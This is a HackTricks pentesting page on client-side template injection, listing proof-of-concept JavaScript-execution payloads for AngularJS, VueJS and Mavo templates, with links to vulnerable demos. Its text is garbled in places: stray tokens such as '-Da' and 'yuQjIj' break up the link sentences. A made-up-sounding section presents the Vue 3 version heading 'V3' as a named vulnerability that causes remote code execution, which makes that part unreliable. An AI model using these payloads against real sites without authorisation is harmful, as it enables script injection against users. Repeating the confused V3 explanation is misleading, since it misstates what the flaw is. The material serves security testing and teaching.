Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
# Summary It is like a [**Server Side Template Injection**](ssti-server-side-template-injection/) but in the **client**. The **SSTI** can allow you to **execute code** on the remote server, the **CSTI** could allow you to **execute arbitrary JavaScript** code in the victim. The way to **test** for this vulnerability is very **similar** as in the case of **SSTI**, the interpreter is going to expect something to execute **between doubles keys** and will execute it. For example using something like: `{{ 7-7 }}` if the server is **vulnerable** you will see a `0` and if not you will see the original: `{{ 7-7 }}` # AngularJS AngularJS is a widely-used JavaScript framework that interacts with HTML through attributes known as directives, a notable one being **`ng-app`**. This directive allows AngularJS to process the HTML content, enabling the execution of JavaScript expressions inside double curly braces. In scenarios where user input is dynamically inserted into the HTML body tagged with `ng-app`, it's possible to execute arbitrary JavaScript code. This can be achieved by leveraging the syntax of AngularJS within the input. Below are examples demonstrating how JavaScript code can be executed: ```javascript {{$on.constructor('alert(1)')()}} {{constructor.constructor('alert(1)')()}}
``` **AngularJS**-Da **vulnerability**-Da **basic online example**-Da yuQjIj [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) 'ej **[Burp Suite Academy](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)**-Da {% hint style="danger" %} [**Angular 1.6 removed the sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:\~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.\&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.) so from this version a payload like `{{constructor.constructor('alert(1)')()}}` or `` should work. {% endhint %} # VueJS **Vulnerable vue.js**-Da **implementation**-Da yuQjIj [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)\ Working payload: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D) 'ej **source code**-Da **vulnerable example**-Da yuQjIj [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example) 'ej. ```markup ">
aaa
``` **V3** **V3** is a client-side template injection (CSTI) vulnerability that affects applications built with the VUE framework. This vulnerability allows an attacker to inject malicious code into the client-side templates, leading to potential remote code execution. ### Exploiting V3 To exploit V3, an attacker needs to identify the injection point in the application's client-side templates. This can be done by analyzing the application's source code or by using automated tools. Once the injection point is identified, the attacker can craft a payload that will be executed within the client-side template. This payload can include JavaScript code that performs various malicious actions, such as stealing sensitive information or performing unauthorized actions on behalf of the user. ### Mitigating V3 To mitigate V3, it is recommended to follow secure coding practices when developing applications with the VUE framework. This includes properly sanitizing user input and validating any data that is used in client-side templates. Additionally, it is important to keep the VUE framework and any related libraries up to date, as vulnerabilities in these components can be exploited by attackers. ### Conclusion V3 is a serious vulnerability that can lead to remote code execution in applications built with the VUE framework. By understanding how this vulnerability works and following secure coding practices, developers can protect their applications from potential attacks. ``` {{_openBlock.constructor('alert(1)')()}} ``` Credit: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets) ## **V2** ``` {{constructor.constructor('alert(1)')()}} ``` Credit: [Mario Heiderich](https://twitter.com/cure53berlin) **Check more VUE payloads in** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected) # Mavo Payload: ``` [7*7] [(1,alert)(1)]
{{top.alert(1)}}
[self.alert(1)] javascript:alert(1)%252f%252f..%252fcss-images [Omglol mod 1 mod self.alert (1) andlol] [''=''or self.alert(lol)] test
lolxself.alert('lol')lolx
test [self.alert(1)mod1] ``` **More payloads in** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations) # **Brute-Force Detection List** {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.